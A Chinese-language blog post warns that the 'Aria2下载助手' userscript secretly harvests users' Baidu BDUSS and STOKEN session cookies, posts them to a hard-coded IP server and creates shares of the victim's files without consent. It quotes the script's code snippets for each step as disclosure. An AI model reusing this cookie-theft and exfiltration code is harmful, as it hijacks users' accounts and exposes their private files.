Aria2下载助手脚本被曝会上传用户隐私

“Aria2下载助手”脚本地址:

https://greasyfork.org/zh-CN/scripts/390707-aria2下载助手

 

现在Greasy Fork网站上已经删除了,还在使用的小伙伴请马上停止使用!!!

这是吾爱破解论坛坛友的分析,已经获得该作者授权分享,原帖地址:

https://www.52pojie.cn/thread-1074517-1-1.html

 

该脚本代码分析:

1)用GM_cookie.list读取你的BDUSS和STOCKEN信息
代码:

(GM_cookie.list({}, e => {
                   let t = ["BDUSS", "STOKEN"],
                        o = [];
                    e.forEach(e => {
                        t.includes(e.name) && o.push(e.name + "=" + e.value)
                    })

2)上传1)获得的信息到IP为111.229.137.150的服务器上

代码

GM_xmlhttpRequest({
                                            method: "POST",
                                            url: "http://111.229.137.150/img/baiduyun.php",
                                            data: u.serialize(o),
                                            headers: {
                                                "Content-type": "application/x-www-form-urlencoded"
                                            },
                                            error() {
                                                console.log("error link =", ++i), ipod.surl && n();
                                                e()
                                            },
                                            onload(o) {
                                                console.log("parse link =", ++i);
                                                let r = JSON.parse(o.responseText);
                                                0 == r.error && (t.url = r.url.map(e => e.replace("https", "http"))), ipod.surl && n();
                                                e()
                                            }
                                        })

3)把你的文件在未经你同意的情况下分享出去

代码:

await $.ajax({
                                                    url: "https://pan.baidu.com/share/set",
                                                    method: "POST",
                                                    data: u.serialize(t),
                                                    success(e) {
                                                        ipod.shareid = e.shareid, ipod.surl = 0 == e.errno ? e.link.substring(25) : ""
                                                    }
                                                })

这是Greasy Fork上关于该脚本的讨论:

https://greasyfork.org/zh-CN/forum/discussion/67928/x

未经允许不得转载:BINCODE » Aria2下载助手脚本被曝会上传用户隐私

赞 (1)